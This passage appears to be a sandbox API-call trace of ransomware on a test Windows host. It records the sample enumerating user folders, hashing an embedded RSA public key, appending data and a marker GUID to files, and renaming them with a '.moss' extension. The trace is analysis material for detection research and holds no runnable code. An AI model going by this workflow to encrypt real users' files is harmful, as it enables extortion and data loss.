0x3b41660 [0169.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.948] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.948] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.948] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.948] CloseHandle (hObject=0x664) returned 1 [0169.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0169.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0169.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0169.950] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zw0x1 T.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw0x1 t.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zw0x1 T.doc.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw0x1 t.doc.moss")) returned 1 [0169.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.951] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.953] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d88c60, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x3532b480, ftLastAccessTime.dwHighDateTime=0x1d5b1da, ftLastWriteTime.dwLowDateTime=0x3532b480, ftLastWriteTime.dwHighDateTime=0x1d5b1da, nFileSizeHigh=0x0, nFileSizeLow=0xc69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_L_jWhbhbh.xlsx", cAlternateFileName="_L_JWH~1.XLS")) returned 1 [0169.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.953] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_L_jWhbhbh.xlsx") returned=".xlsx" [0169.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_L_jWhbhbh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_l_jwhbhbh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.953] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=3177) returned 1 [0169.953] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.957] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.957] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.958] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.958] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.958] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.958] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc69, lpOverlapped=0x0) returned 1 [0169.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.958] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.958] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.959] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.959] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.959] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.959] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.959] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.959] GetLastError () returned 0x0 [0169.960] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.960] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.960] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.960] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.960] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc70) returned 0x3b4b098 [0169.960] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.960] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45e00 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc110 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bd28 [0169.960] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc128 [0169.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc158 [0169.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.961] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc170 [0169.961] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.961] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.961] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.961] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.961] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.961] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.962] CloseHandle (hObject=0x664) returned 1 [0169.963] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_L_jWhbhbh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_l_jwhbhbh.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_L_jWhbhbh.xlsx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_l_jwhbhbh.xlsx.moss")) returned 1 [0169.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.964] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.993] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d88c60, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x3532b480, ftLastAccessTime.dwHighDateTime=0x1d5b1da, ftLastWriteTime.dwLowDateTime=0x3532b480, ftLastWriteTime.dwHighDateTime=0x1d5b1da, nFileSizeHigh=0x0, nFileSizeLow=0xc69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_L_jWhbhbh.xlsx", cAlternateFileName="_L_JWH~1.XLS")) returned 0 [0169.993] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0169.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0169.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.994] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0169.994] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0169.994] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0169.994] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0169.994] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0169.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.994] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0169.994] PathFindFileNameW (pszPath="") returned="" [0169.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0169.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0169.995] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.995] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.995] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0169.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.995] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0169.995] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0169.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0169.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.995] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0169.996] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0169.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0169.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0169.996] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0169.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.996] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0169.996] PathFindFileNameW (pszPath="") returned="" [0169.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0169.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0169.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0169.997] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0169.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0169.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.997] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0169.998] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0169.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0169.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0169.998] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0169.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.998] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0169.998] PathFindFileNameW (pszPath="") returned="" [0169.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0169.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.998] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 